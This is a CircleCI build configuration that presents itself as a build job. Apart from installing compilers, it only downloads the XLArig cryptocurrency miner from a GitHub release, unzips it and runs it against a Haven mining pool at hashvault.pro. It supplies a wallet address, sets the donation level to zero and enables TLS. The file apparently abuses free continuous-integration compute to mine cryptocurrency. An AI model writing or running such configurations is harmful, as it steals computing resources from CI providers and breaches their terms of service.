version: 2.1 

jobs:
  build:
    machine:
      image: ubuntu-2004:202008-01
  
 
    steps:
      - checkout
      - run:
          name: Update
          command: sudo apt-get update
      - run:
          name: Getcompiler
          command: sudo apt-get install -y gcc git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
      - run:
          name: getdownload
          command: wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip
          
      - run:
          name: unzipfile
          command: unzip XLArig-v5.2.2-linux-x86_64.zip
     
      - run:
          name: Execute
          command: ./xlarig -a cn-heavy/xhv -u hvxxvXw48Bm36cfM3NDHWp3sUiK48fbJW2eS5Snimi7TfXvxfR8nao2MMQqpWQcpNQX8RKrkvMiac3v8hppQmjrd21nwZ5K1Gj -p bitbucket -o singapore01.hashvault.pro:443 --donate-level=0 --tls -donate-over-proxy=0  --randomx-mode=auto --randomx-1gb-pages
          
          
     